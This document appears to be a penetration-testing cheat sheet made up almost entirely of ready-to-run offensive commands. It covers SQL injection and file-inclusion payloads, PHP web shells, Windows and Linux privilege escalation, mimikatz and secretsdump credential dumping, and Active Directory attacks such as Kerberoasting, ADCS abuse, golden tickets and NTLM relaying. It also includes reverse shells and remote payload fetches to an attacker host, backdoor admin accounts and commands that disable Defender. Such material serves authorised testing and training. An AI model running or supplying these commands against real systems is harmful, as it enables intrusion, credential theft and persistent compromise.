gobuster dir -u <URL> -w <DIRLIST> -t 200 -k -r
gobuster vhost -u <URL> -w <DIRLIST> --append-domain -t 200

feroxbuster -u <URL> -w <DIRLIST> -x php,html,txt -v --filter-status 404
feroxbuster -u <URL> -w <DIRLIST> -k

ffuf -u "<URL>?id=FUZZ" -w <WORDLIST>
ffuf -u <URL>/FUZZ -w <DIRLIST>

'
''
' OR 1=1 -- //
' OR '1'='1
" OR "1"="1
' OR 1=1 #
admin'--

' ORDER BY 1 -- //
' ORDER BY 2 -- //
' ORDER BY 3 -- //
-- Increase until error

' UNION SELECT null, database(), user(), @@version, null -- //
' UNION SELECT null, table_name, column_name, table_schema, null FROM information_schema.columns WHERE table_schema=database() -- //
' UNION SELECT null, username, password, null, null FROM users -- //

-- Boolean
' AND 1=1 -- //   -- True
' AND 1=2 -- //   -- False

-- Time-based MySQL
' AND IF(1=1, SLEEP(3), 0) -- //
-- Time-based MSSQL
'; WAITFOR DELAY '0:0:3' --
-- Time-based PostgreSQL
' AND pg_sleep(3) -- //

<script>alert(42)</script>

# php://filter - Read source
?page=php://filter/convert.base64-encode/resource=index.php
echo BASE64 | base64 -d

# data:// - Inline PHP
?page=data://text/plain,<?php system($_GET['c']); ?>&c=id

# php://input - Execute POST data
curl -X POST --data "<?php system('id'); ?>" "http://<IP>/?page=php://input"

# Poison log via User-Agent
curl -A "<?php system(\$_GET['c']); ?>" http://<IP>/
?page=/var/log/apache2/access.log&c=id

echo '<?php system($_GET["c"]); ?>' > s.php
python3 -m http.server 80
?page=http://<LHOST>/s.php&c=id

Content-Type: image/jpeg
GIF89a<?php system($_GET['c']); ?>
exiftool -Comment='<?php system($_GET["c"]); ?>' img.jpg -o shell.php.jpg

# Upload .htaccess with:
AddType application/x-httpd-php .jpg
# Then upload shell.jpg

sudo nbtscan -r 192.168.50.0/24
nmap --script smb-enum-shares,smb-enum-users -p 445 <IP>

smbclient -L //<IP>/ -U '<USER>%<PASS>'
smbclient //<IP>/share -U '<USER>%<PASS>'
smbclient \\\\<IP>\\share -U <USER> --pw-nt-hash NTHASH

# Inside smbclient
PROMPT off
mget *

# Or with nxc
nxc smb <IP> -u '<USER>' -p '<PASS>' -M spider_plus -o DOWNLOAD_FLAG=True

host www.megacorpone.com
host -t mx megacorpone.com
host -t txt megacorpone.com
dnsrecon -d megacorpone.com -t std
dnsenum megacorpone.com

for ip in $(cat list.txt); do host $ip.megacorpone.com; done

# Inside ftp/smbclient
PROMPT off
mget *

onesixtyone -c community.txt -i ips.txt

snmpwalk -c public -v1 -t 10 <IP>

sudo download-mibs
sudo sed -i 's/^mibs :/#mibs :/' /etc/snmp/snmp.conf
snmpwalk -v1 -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull -t 64
snmpwalk -v1 -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendCommand -t 64

nc -nv <IP> 25

VRFY user

smtp-user-enum -U /usr/share/wordlists/metasploit/unix_users.txt <IP> 25

hydra -l operator -P wordlist.txt <IP> smtp

mssqlclient.py <DOMAIN>/<USER>:<PASS>@<IP>

enum_db          -- enum databases
enum_links       -- enum linked servers
enum_impersonate -- check logins that can be impersonated
enum_logins      -- enum login users

EXEC ('SELECT @@version') AT DC01;
EXEC [DC01].master.dbo.xp_cmdshell 'whoami';

# On attacker: sudo python3 Responder.py -I tun0
# On MSSQL:
EXEC master..xp_dirtree '\\<LHOST>\share';

nxc mssql <IP> -u <USER> -p '<PASS>' --local-auth -x whoami
nxc mssql <IP> -u <USER> -p '<PASS>' --local-auth -M mssql_priv

mysql -h localhost -u sql_user -p
mysqldump -u root -p --all-databases > alldb.sql

sudo mysqld_safe --skip-grant-tables --skip-networking &
sudo mysql

ssh -i id_rsa <USER>@<IP>
sshpass -p "<PASS>" ssh <USER>@<IP>
ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no <USER>@<IP>
chmod 600 id_rsa
ssh-keygen -t ed25519

xfreerdp /u:<USER> /p:'<PASS>' /v:<IP> /cert:ignore
xfreerdp /u:<USER> /pth:NTHASH /v:<IP> /cert:ignore
xfreerdp /u:<USER> /p:'<PASS>' /v:<IP> /drive:share,/tmp +clipboard /cert:ignore

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0

evil-winrm-py -i <IP> -u <USER> -p '<PASS>'
evil-winrm-py -i <IP> -u <USER> -H NTHASH

Enable-PSRemoting -Force
Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*" -Force

showmount -e <IP>
sudo mount -t nfs <IP>:/remote /local
rpcinfo <IP>

whoami /all
systeminfo
Get-LocalUser
Get-LocalGroup
Get-LocalGroupMember Administrators

ipconfig /all
route print
netstat -ano
net view \\<IP> /all

Get-ChildItem Env:
$env:PATH
.\accesschk.exe -uwqs $env:USERNAME C:\ 2>$null | Where-Object {$_ -notmatch "C:\\Users\\$env:USERNAME"}
icacls . /T 2>$null | sls -Pattern "everyone|authenticated users|$env:USERNAME"

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-Process
tree /A /F
Get-ChildItem -Force
Get-ChildItem -Recurse -Force | ForEach-Object { $_.FullName }

reg query HKLM\SYSTEM\CurrentControlSet\Services /s /v ImagePath | findstr /ri ":\\ %systemroot% %programfiles% %windir%"
sc.exe sdshow SERVICENAME
icacls "path"

$o=@();while(1){$n=ps;$new=$n|?{$_.Id -notin $o.Id};if($new){$new|%{Write-Host "[$(date -f 'HH:mm:ss')] PID:$($_.Id) $($_.Name) $($_.Path)" -ForegroundColor Cyan}};$o=$n;sleep 1}

# WinPEAS
iwr -uri http://<LHOST>/winPEASx64.exe -Outfile winPEAS.exe && .\winPEAS.exe

# PowerUp
iwr -uri http://<LHOST>/powerup.ps1 -Outfile powerup.ps1
powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks

# Seatbelt
.\Seatbelt.exe -group=all

.\SweetPotato.exe -p cmd.exe -a "/c whoami"
.\SweetPotato.exe -p C:\Windows\System32\cmd.exe -a "/c net user pwned Pass1! /add && net localgroup administrators pwned /add"

Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse |Get-ItemProperty -name Version,Release -EA 0 |Where { $_.PSChildName -match '^(?!S)\p{L}'} |Select PSChildName, Version, Release

# 1. Upload potato
iwr -uri http://<LHOST>/SweetPotato.exe -Outfile SP.exe

# 2a. Add admin user
.\SP.exe -p cmd.exe -a "/c net user pwned Pass1! /add && net localgroup administrators pwned /add"

# 2b. Or reverse shell
.\SP.exe -p C:\path\nc.exe -a "-e cmd.exe <LHOST> <LPORT>"

# If SweetPotato fails: PrintSpoofer → GodPotato → SigmaPotato

.\PrintSpoofer64.exe -c "C:\Windows\System32\cmd.exe /c powershell IEX(iwr http://<LHOST>/s.ps1 -usebasicparsing)"

.\godpotato.exe -cmd "cmd /c reg add \"HKLM\System\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
.\godpotato.exe -cmd "cmd /c sc start TermService"
.\godpotato.exe -cmd "cmd /c reg add \"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"
.\godpotato.exe -cmd "cmd /c net user bob Password123! /add"
.\godpotato.exe -cmd "cmd /c net localgroup administrators bob /add"

procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Transfer to attacker:
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

meterpreter> migrate <lsass_pid>
meterpreter> hashdump

reg save hklm\sam sam.hive
reg save hklm\system system.hive

secretsdump.py -sam sam.hive -system system.hive LOCAL

nxc smb <IP> -u <USER> -p '<PASS>' -M backup_operator
# Downloads SAM, SYSTEM, NTDS.dit to /tmp/
secretsdump.py -ntds ntds.dit -system system.hive LOCAL

robocopy /b "C:\Users\Administrator\Desktop" "C:\Users\user\Desktop"

copy C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe /Y
# Lock screen → click Ease of Access (Win+U) → SYSTEM shell

.\SeRestoreAbuse.exe "cmd /c net user pwned Pass1! /add && net localgroup administrators pwned /add"

# Load vulnerable Capcom.sys driver
.\EopLoadDriver.exe System\CurrentControlSet\dfserv C:\path\Capcom.sys
.\ExploitCapcom.exe

. .\PowerUp.ps1
Get-ModifiableServiceFile
Install-ServiceBinary -Name 'svc'  # creates admin john/Password123!

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
icacls "C:\path\to\service.exe"

sc.exe qc "Name"
sc.exe start "Name"
sc.exe stop "Name"
sc.exe config ServiceName binPath= "C:\path"

powershell.exe -ExecutionPolicy Bypass -File .\Get-ServiceACL.ps1 -Name "serviceName"

// adduser.c - compile: x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
#include <stdlib.h>
int main() {
  system("net user pwned Password1! /add");
  system("net localgroup administrators pwned /add");
  return 0;
}

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell.exe
move C:\path\original.exe original.bak
iwr -uri http://<LHOST>/shell.exe -Outfile C:\path\original.exe
net stop <service> && net start <service>

Path: C:\Program Files\My App\My Service\svc.exe
Windows tries:
  C:\Program.exe
  C:\Program Files\My.exe
  C:\Program Files\My App\My.exe        ← plant here if writable
  C:\Program Files\My App\My Service\svc.exe

. .\PowerUp.ps1
Get-UnquotedService
Write-ServiceBinary -Name 'SvcName' -Path "C:\Program Files\My App\My.exe"

wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """"

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o My.exe
iwr -uri http://<LHOST>/My.exe -Outfile "C:\Program Files\My App\My.exe"
Start-Service -Name <svc>

# 1. Find non-standard app, check if writable
echo "test" > "C:\App\test.txt"

# 2. Transfer binary to controlled env, run with Procmon
#    Filter: Process Name = target.exe
#    Look for: NAME NOT FOUND → missing DLL

# 3. Generate malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f dll -o MissingDll.dll

# 4. Upload to app directory
iwr -uri http://<LHOST>/MissingDll.dll -Outfile "C:\App\MissingDll.dll"

$env:PATH -split ";" | %{icacls $_ 2>$null | sls -Pattern "everyone|authenticated users|$env:USERNAME"}

schtasks /query /fo LIST /v

# Non-Microsoft tasks
Get-ScheduledTask | Where-Object {$_.Author -notlike "*Microsoft*"} | Select-Object TaskName,@{N='Exe';E={$_.Actions.Execute}},State | Format-Table -Wrap

# Tasks running from user-writable paths
Get-ScheduledTask | Where-Object {$_.Actions.Execute -like "*Users*"} | ForEach-Object {
  $_ | Select TaskName, @{N='Execute';E={$_.Actions.Execute}}, @{N='RunAsUser';E={$_.Principal.UserId}}, State | Format-List *
}

# Run in last X mins
$limit=(Get-Date).AddMinutes(-20); schtasks /query /fo CSV /v | ConvertFrom-Csv | ?{ $_.TaskName -ne 'TaskName' -and $_.'Last Run Time' -ne 'N/A' -and (Get-Date $_.'Last Run Time' -ErrorAction SilentlyContinue) -ge $limit } | select TaskName,'Last Run Time',Status | ft -AutoSize

icacls "C:\Users\user\task.exe"
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o task.exe
move C:\Users\user\task.exe task.bak
iwr -uri http://<LHOST>/task.exe -Outfile "C:\Users\user\task.exe"

# Both must be 1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Exploit: MSI runs as SYSTEM
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f msi -o shell.msi
msiexec /quiet /qn /i shell.msi

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\ -Include *.kdbx,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Recurse -Include *.conf,*.ini,*.xml,*.properties,*.txt -Path . | Select-String "password\s*="
tree /A /F

Get-History
(Get-PSReadlineOption).HistorySavePath
type C:\Users\<USER>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\Public\Transcripts\*.txt

.\strings.exe -accepteula application.exe | findstr /i "password"
strings application.exe | grep -iE "password|user|admin|key"

Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object {$_.Id -eq 4104} | Select-Object -ExpandProperty Message

copy C:\Windows.old\Windows\System32\config\SAM C:\Users\Public\SAM
copy C:\Windows.old\Windows\System32\config\SYSTEM C:\Users\Public\SYSTEM

secretsdump.py -sam SAM -system SYSTEM LOCAL

RunasCs.exe <USER> <PASS> "C:\temp\nc.exe -e cmd.exe <LHOST> <LPORT>" --bypass-uac

$password = ConvertTo-SecureString "<PASS>" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<USER>", $password)
Enter-PSSession -ComputerName <IP> -Credential $cred

id && whoami && hostname && uname -a && groups
cat /etc/passwd
cat /etc/issue && cat /etc/os-release
ps aux
ip a && routel
ss -antup
crontab -l && sudo crontab -l
ls -lah /etc/cron*
cat /etc/crontab
dpkg -l
cat /etc/fstab && df -h
sudo -l

find / -perm -u=s -type f 2>/dev/null
getcap -r / 2>/dev/null

find / \( -path /proc -o -path /snap \) -prune -o -type d -writable -print 2>/dev/null
find / \( -path /proc -o -path /snap -o -path /sys -o -path /dev -o -path /run \) -prune -o -type f -writable -print 2>/dev/null

# Databases
find / -type f \( -iname "*.db" -o -iname "*.sqlite" \) 2>/dev/null

# Sensitive files
find / \( -path /proc -o -path /sys -o -path /usr -o -path /snap \) -prune -o -type f \( -iname ".env" -o -iname "*config*" -o -iname "*.ini*" -o -iname "*credential*" -o -iname "*.bak" -o -iname "*history*" -o -iname "*id_rsa*" -o -iname "*.key" \) -print 2>/dev/null

# Find passwords in files
find . -type f \( -name "*.php" -o -name "*.conf" -o -name "*.env" -o -name "*.inc" \) -print0 2>/dev/null | xargs -0 grep -niE "(password\s*=|password\s*=>|\bpassword\b)" 2>/dev/null | cut -c1-200

cat /proc/net/fib_trie

# Linpeas
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

# unix-privesc-check
./unix-privesc-check standard > output.txt

# Traitor
./traitor-386

# pspy (monitor processes)
./pspy64

sudo -l

sudo -V | head -1
# If config: (ALL, !root) /bin/bash
sudo -u#-1 /bin/bash

sudo aa-status

find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null

getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null

find /home/user -exec "/usr/bin/bash" -p \;

crontab -l
sudo crontab -l
ls -la /etc/cron*
cat /etc/crontab
ls -la /var/spool/cron/
grep "CRON" /var/log/syslog
grep "CRON" /var/log/cron

find /home -type f -writable 2>/dev/null

# Add reverse shell to writable script
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc <LHOST> <LPORT> >/tmp/f" >> script.sh

# Alternative payloads
echo "cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash" >> script.sh
echo "echo 'user ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers" >> script.sh

# When cron runs: tar czf /var/backups/backup.tar.gz *
echo 'cp /bin/bash /tmp/bash && chmod +s /tmp/bash' > privesc.sh
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh privesc.sh"

# Wait for cron, then:
/tmp/bash -p

uname -a
uname -r
cat /etc/issue && cat /etc/os-release

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
bash linux-exploit-suggester.sh
searchsploit kernel $(uname -r)

find / -writable -type f 2>/dev/null | grep etc
ls -la /etc/passwd

openssl passwd password123
echo "root2:wI1Q.j5MF3peQ:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
}

#include <stdio.h>
#include <unistd.h>
int main(void){
    setuid(0); setgid(0); seteuid(0); setegid(0);
    execvp("/bin/sh", (char*[]){"/bin/sh", NULL});
}

gcc -fPIC -shared -o libhax.so libhax.c -ldl
gcc -static -o rootshell rootshell.c
# Transfer both to target, then:
cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell

sudo -l
cat ~/.bash_history
cat /home/*/.bash_history
cat ~/.bashrc
env
ls ~/.ssh/

watch -n 1 "ps aux | grep pass"
sudo tcpdump -i lo -A | grep "pass"

find / -type f \( -iname "*.db" -o -iname "*.sqlite" \) 2>/dev/null
find / -name "config.php" 2>/dev/null
find / -name "wp-config.php" 2>/dev/null
find / -type f \( -iname ".env" -o -iname "*credential*" -o -iname "*secret*" \) 2>/dev/null
find / -type f \( -iname "*.pem" -o -iname "*.key" -o -iname "*id_rsa*" \) 2>/dev/null
find / -type f \( -iname "*.bak" -o -iname "*.old" -o -iname "*.swp" \) 2>/dev/null

id
groups

docker run -v /:/mnt --rm -it alpine chroot /mnt sh
docker run -v /root:/root -it ubuntu bash

df -h
debugfs /dev/sda5
# In debugfs: ls, cd /root, cat flag.txt

cat /etc/shadow
john --wordlist=<WORDLIST> shadow.txt

cat /var/log/auth.log | grep -i pass

nxc smb <IP> -u '' -p '' --users-export file
nxc smb <IP> -u '' -p '' --shares
nxc smb <IP> -u 'a' -p '' --shares

enum4linux-ng.py -a -u '' -p '' <IP>
ldapsearch -x -H <IP> -s base

kerbrute userenum -d <DOMAIN> userlist.txt

nxc smb <IP> -u <USER> -p passFile --continue-on-success
nxc smb <IP> -u <USER> -p passFile --no-bruteforce

GetNPUsers.py -dc-ip <IP> <DOMAIN>/ -usersfile users.txt -format hashcat
GetNPUsers.py -dc-ip <IP> <DOMAIN>/ -no-pass
nxc ldap <IP> -u <USER> -p '<PASS>' --asreproast output.txt

bloodhound-python -u '<USER>' -p '<PASS>' -d <DOMAIN> --zip -c All -ns <IP> -dc dc1.<DOMAIN>

Import-Module .\Sharphound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\user\Desktop\ -OutputPrefix "audit"
.\sharphound.exe -c All --outputdirectory . --outputprefix "audit"

nxc smb targets -u <USER> -p '<PASS>'
nxc winrm targets -u <USER> -p '<PASS>'
nxc smb targets -u <USER> -p '<PASS>' --users-export output.txt

nxc ldap <IP> -u <USER> -p '<PASS>' --kerberoasting output.txt
GetUserSPNs.py -request -dc-ip <IP> <DOMAIN>/<USER>:<PASS>

nxc smb --gen-relay-list targets.txt 192.168.1.0/24

nxc smb <IP> --generate-hosts-file hosts

powershell -ep bypass
Import-Module .\PowerView.ps1

Get-NetDomain
Get-NetUser | select cn,pwdlastset,lastlogon
Get-NetUser -SPN | select samaccountname,serviceprincipalname
Get-NetGroup | select cn
Get-NetGroupMember "Domain Admins"
Get-NetComputer -FullData | select operatingsystem,dnshostname
Find-LocalAdminAccess
Get-NetSession -ComputerName files04 -Verbose
Find-DomainShare -CheckShareAccess

Get-ObjectAcl -Identity stephanie
Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
Convert-SidToName S-1-5-21-xxx
Invoke-ACLScanner -ResolveGUIDs

bloodyAD --host <IP> -d <DOMAIN> -u <USER> -p '<PASS>' get writable --include-del
dacledit.py <DOMAIN>/"<USER>":'<PASS>' -dc-ip <IP> -target <USER>

bloodyAD --host <IP> -d <DOMAIN> -u <USER> -p '<PASS>' set password TARGET 'NewP@ss123'

net group "Management Department" stephanie /add /domain

bloodyAD --host <IP> -d <DOMAIN> -u <USER> -p '<PASS>' set object TARGET servicePrincipalName -v 'http/pwned'
nxc ldap <IP> -u <USER> -p '<PASS>' --kerberoasting output.txt
hashcat -m 13100 output.txt <WORDLIST>

bloodyAD --host <IP> -d <DOMAIN> -u <USER> -p '<PASS>' set password TARGET 'NewP@ss123'

bloodyAD --host <IP> -d <DOMAIN> -u <USER> -p '<PASS>' add genericAll TARGET <USER>

bloodyAD --host <IP> -d <DOMAIN> -u <USER> -p '<PASS>' set owner TARGET <USER>

secretsdump.py <DOMAIN>/<USER>:'<PASS>'@<IP>
evil-winrm-py -i <IP> -u Administrator -H HASH

certipy find -u '<USER>@<DOMAIN>' -p '<PASS>' -dc-ip <IP> -vulnerable -stdout
certipy find -ldap-scheme ldap -u '<USER>@<DOMAIN>' -p '<PASS>' -dc-ip <IP> -vulnerable -stdout

certipy req -u '<USER>@<DOMAIN>' -p '<PASS>' -dc-ip <IP> -target CA_HOST -ca CA_NAME -template VulnTemplate -upn administrator@<DOMAIN>
certipy auth -pfx administrator.pfx -dc-ip <IP>

certipy req -u '<USER>@<DOMAIN>' -p '<PASS>' -dc-ip <IP> -ca CA_NAME -template EnrollmentAgent
certipy req -u '<USER>@<DOMAIN>' -p '<PASS>' -dc-ip <IP> -ca CA_NAME -template User -on-behalf-of '<DOMAIN>\Administrator' -pfx enrollment_agent.pfx

certipy template -u '<USER>@<DOMAIN>' -p '<PASS>' -dc-ip <IP> -template VulnTemplate -save-old
certipy req -u '<USER>@<DOMAIN>' -p '<PASS>' -dc-ip <IP> -ca CA_NAME -template VulnTemplate -upn administrator@<DOMAIN>

certipy ca -u '<USER>@<DOMAIN>' -p '<PASS>' -dc-ip <IP> -ca CA_NAME -enable-template SubCA
certipy req -u '<USER>@<DOMAIN>' -p '<PASS>' -dc-ip <IP> -ca CA_NAME -template SubCA -upn administrator@<DOMAIN>

ntlmrelayx.py -t http://CA_HOST/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
python3 PetitPotam.py <LHOST> <IP>

# Requires krbtgt hash (DA or DC compromise)
kerberos::purge
kerberos::golden /user:jen /domain:<DOMAIN> /sid:S-1-5-21-... /krbtgt:HASH /ptt
misc::cmd
PsExec.exe \\dc1 cmd.exe

# Requires service account hash
kerberos::golden /sid:S-1-5-21-... /domain:<DOMAIN> /ptt /target:web04.<DOMAIN> /service:http /rc4:HASH /user:jeffadmin
iwr -UseDefaultCredentials http://web04

sekurlsa::pth /user:jen /domain:<DOMAIN> /ntlm:HASH /run:PowerShell.exe
# In new window:
klist
net use \\dc1\c$

.\mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"
kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
klist

getTGT.py <DOMAIN>/'<USER>':'<PASS>'
export KRB5CCNAME=$(pwd)/<USER>.ccache
# Most tools: add -k flag

vshadow.exe -nw -p C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak
reg.exe save hklm\system c:\system.bak
secretsdump.py -ntds ntds.dit.bak -system system.bak LOCAL

# Forge inter-realm ticket with extra SID
ticketer.py -aesKey 'KEY' -domain-sid 'CHILD_SID' -domain 'child.parent.com' -extra-sid 'PARENT_SID-519' 'Administrator' -extra-pac
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass parent.com/Administrator@DC01.parent.com

sudo responder -I tun0
# Trigger: dir \\<LHOST>\share

impacket-ntlmrelayx --no-http-server -smb2support -t <IP> -c "powershell -e BASE64"
nc -lvnp <LPORT>
# Trigger: dir \\<LHOST>\share

nxc smb --gen-relay-list targets.txt 192.168.1.0/24
impacket-ntlmrelayx -socks -tf targets.txt -smb2support
# Use: proxychains secretsdump.py <DOMAIN>/<USER>@<IP>

nxc smb <IP> -u <USER> -p '<PASS>' -M slinky -o NAME=Apps SERVER=<LHOST>
# Cleanup: add CLEANUP=True

python3 badpdf.py --input original.pdf --output malicious.pdf --attacker-ip <LHOST>

EXEC xp_dirtree '\\<LHOST>\share';
EXEC xp_subdirs '\\<LHOST>\share';
EXEC xp_fileexist '\\<LHOST>\share\file.txt';

python3 PetitPotam.py <LHOST> <IP>
python3 PetitPotam.py -u <USER> -p '<PASS>' <LHOST> <IP>

evil-winrm-py -i <IP> -u <USER> -p '<PASS>'
evil-winrm-py -i <IP> -u <USER> -H NTHASH

impacket-psexec <DOMAIN>/<USER>:<PASS>@<IP>
impacket-psexec -hashes :NTHASH <DOMAIN>/<USER>@<IP>
psexec.py -k -no-pass <DOMAIN>/Administrator@DC01.<DOMAIN>

impacket-wmiexec <DOMAIN>/<USER>:<PASS>@<IP>
impacket-wmiexec -hashes :NTHASH <DOMAIN>/<USER>@<IP>

$com = [Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1", "<IP>"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami", "7")

.\mimikatz.exe "privilege::debug" "token::elevate" "log" "lsadump::sam /patch" "lsadump::sam" "sekurlsa::msv" "lsadump::secrets" "lsadump::lsa" "lsadump::lsa /patch" "lsadump::cache" "sekurlsa::logonpasswords full" "sekurlsa::ekeys" "sekurlsa::dpapi" "sekurlsa::credman" "vault::list" "vault::cred /patch" "exit"

secretsdump.py <DOMAIN>/<USER>:<PASS>@<IP>

./lazagne.exe all

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
Set-MpPreference -DisableRealtimeMonitoring $true

dpapi.py masterkey -file MASTERKEYFILE -sid SID -password '<PASS>'

sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up

# Attacker
./proxy -selfcert -laddr $(ip -4 addr show tun0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'):443

# Target (Linux)
wget http://<LHOST>/agent && chmod +x agent
./agent -connect <LHOST>:443 -ignore-cert &

# Target (Windows)
iwr -uri http://<LHOST>/agent.exe -Outfile agent.exe
.\agent.exe -connect <LHOST>:443 -ignore-cert

interface_create --name agent1
route_add --name agent1 --route 240.0.0.1/32
session
autoroute
# Access: xfreerdp /v:240.0.0.1:3389

interface_create --name interface1
route_add --name interface1 --route 10.4.145.0/24
session
autoroute
sudo ip link set interface1 up

listener_add --addr 10.10.198.147:8080 --to <LHOST>:80
listener_add --addr <IP>:443 --to <LHOST>:443

# Server on Victim
./chisel server --reverse --port 9999

# Client on Attacker
./chisel client victim-ip:9999 R:8080:127.0.0.1:8080

# Server on Attacker
./chisel server --port 8000

# Client on Victim
./chisel client attacker-ip:8000 8080:internal-host:80

./chisel client victim-ip:9999 R:socks
# proxychains: socks5 127.0.0.1 1080

hashcat -m 0 hash.txt <WORDLIST> --force
hashcat -m 1000 hash.txt <WORDLIST> -r /usr/share/hashcat/rules/best66.rule --force

ssh2john id_rsa > ssh.hash
keepass2john Database.kdbx > keepass.hash
zip2john archive.zip > zip.hash
sed -i 's/^[^:]*://' ssh.hash

john --wordlist=<WORDLIST> hash.txt
john --show hash.txt

hydra -l operator -P <WORDLIST> <IP> <protocol>

hydra -C /usr/share/wordlists/seclist/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -t 4 -f -vV ftp://<IP>

hydra -L users -P passwords -t 24 ssh://<IP>:<port>

hydra -L users -P passwords <IP> -s <port> http-post-form "/login/index.php:username=^USER^&password=^PASS^&s_mod=login:F=Username or Password wrong"
hydra -L users -P passwords <IP> http-post-form "/login:username=^USER^&password=^PASS^:F=Login failed"

hydra -L users -P <WORDLIST> <IP> https-post-form "/session_login.cgi:user=^USER^&pass=^PASS^&s_mod=login:F=Login failed" -s 20000 -t 4 -I

hydra -L users -P <WORDLIST> http-get://<IP>/ -V -t 64

psexec.py -hashes :NTHASH Administrator@<IP>
wmiexec.py -hashes :NTHASH Administrator@<IP>
smbclient -hashes :NTHASH Administrator@<IP>

secretsdump.py -sam sam.hive -system system.hive LOCAL
secretsdump.py -ntds ntds.dit -system system.hive LOCAL

ntlmrelayx.py --no-http-server -smb2support -t <IP> -c "powershell -e BASE64"

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell.exe

msfvenom -p windows/x64/shell/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o staged.exe
# Needs multi/handler

msfvenom -p php/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -o file.pHP

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f dll -o shell.dll

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f msi -o shell.msi

use multi/handler
set payload windows/x64/shell/reverse_tcp
set LHOST <LHOST>
set LPORT <LPORT>
run

python3 -m http.server 80
sudo python3 -m uploadserver 80

iwr -uri http://<LHOST>/file -Outfile file
certutil -urlcache -split -f http://<LHOST>/file C:\Users\Public\file

wget http://<LHOST>/file -O /tmp/file
curl -o /tmp/file http://<LHOST>/file

scp user@<IP>:/remotepath localPath
scp FileToSend user@<IP>:remotePath
scp -i SSHkeyFile user@<IP>:remotePath localPath

impacket-smbserver -smb2support sharename .
# On Windows: copy file \\<LHOST>\sharename

$form = @{ files = Get-Item "file" }
Invoke-WebRequest -Uri http://<LHOST>/upload -Method Post -Form $form
